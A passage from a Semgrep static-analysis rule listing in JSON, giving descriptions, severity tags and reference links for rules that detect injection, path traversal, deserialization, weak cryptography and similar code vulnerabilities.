data."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","id":"python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","name":"python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","id":"go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","name":"go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask)\n - [https://docs.paramiko.org/en/latest/api/client.html#paramiko.client.SSHClient.exec_command](https://docs.paramiko.org/en/latest/api/client.html#paramiko.client.SSHClient.exec_command)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","id":"python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","name":"python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlalchemy-flask.sqlalchemy-flask)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlalchemy-flask.sqlalchemy-flask","id":"python.flask.db.sqlalchemy-flask.sqlalchemy-flask","name":"python.flask.db.sqlalchemy-flask.sqlalchemy-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlalchemy-flask.sqlalchemy-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS."},"help":{"markdown":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message)\n - [https://www.damonkohler.com/2008/12/email-injection.html](https://www.damonkohler.com/2008/12/email-injection.html)\n","text":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","id":"python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","name":"python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","properties":{"precision":"very-high","tags":["CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","id":"python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","name":"python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Facebook OAuth detected"},"help":{"markdown":"Facebook OAuth detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Facebook OAuth detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","id":"generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","name":"generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. "},"help":{"markdown":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption](https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption)\n - [https://medium.com/asecuritysite-when-bob-met-alice/surely-no-one-uses-ecb-mode-in-aes-332ed90f29d0](https://medium.com/asecuritysite-when-bob-met-alice/surely-no-one-uses-ecb-mode-in-aes-332ed90f29d0)\n","text":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. "},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","id":"swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","name":"swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","id":"python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","name":"python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","id":"python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","name":"python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User controlled data in a HTML string may result in XSS"},"help":{"markdown":"User controlled data in a HTML string may result in XSS\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.security.raw-html-concat.raw-html-concat)\n - [https://owasp.org/www-community/attacks/xss/](https://owasp.org/www-community/attacks/xss/)\n","text":"User controlled data in a HTML string may result in XSS"},"helpUri":"https://semgrep.dev/r/javascript.browser.security.raw-html-concat.raw-html-concat","id":"javascript.browser.security.raw-html-concat.raw-html-concat","name":"javascript.browser.security.raw-html-concat.raw-html-concat","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.security.raw-html-concat.raw-html-concat"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)\n","text":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","id":"java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","name":"java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request)\n - [https://github.com/parnurzeal/gorequest](https://github.com/parnurzeal/gorequest)\n","text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-json-flask.tainted-json-flask)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/json.html](https://docs.python.org/3/library/json.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-json-flask.tainted-json-flask","id":"python.flask.deserialization.tainted-json-flask.tainted-json-flask","name":"python.flask.deserialization.tainted-json-flask.tainted-json-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-json-flask.tainted-json-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"abi.encodePacked hash collision with variable length arguments in $F()"},"help":{"markdown":"abi.encodePacked hash collision with variable length arguments in $F()\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.encode-packed-collision.encode-packed-collision)\n - [https://swcregistry.io/docs/SWC-133](https://swcregistry.io/docs/SWC-133)\n","text":"abi.encodePacked hash collision with variable length arguments in $F()"},"helpUri":"https://semgrep.dev/r/solidity.security.encode-packed-collision.encode-packed-collision","id":"solidity.security.encode-packed-collision.encode-packed-collision","name":"solidity.security.encode-packed-collision.encode-packed-collision","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.encode-packed-collision.encode-packed-collision"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path."},"help":{"markdown":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal)\n - [https://www.owasp.org/index.php/Path_Traversal](https://www.owasp.org/index.php/Path_Traversal)\n","text":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path."},"helpUri":"https://semgrep.dev/r/java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","id":"java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","name":"java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.audit.cookies.httponly-false.httponly-false)\n - [https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware](https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware)\n - [https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions](https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"helpUri":"https://semgrep.dev/r/csharp.lang.audit.cookies.httponly-false.httponly-false","id":"csharp.lang.audit.cookies.httponly-false.httponly-false","name":"csharp.lang.audit.cookies.httponly-false.httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.audit.cookies.httponly-false.httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html)\n - 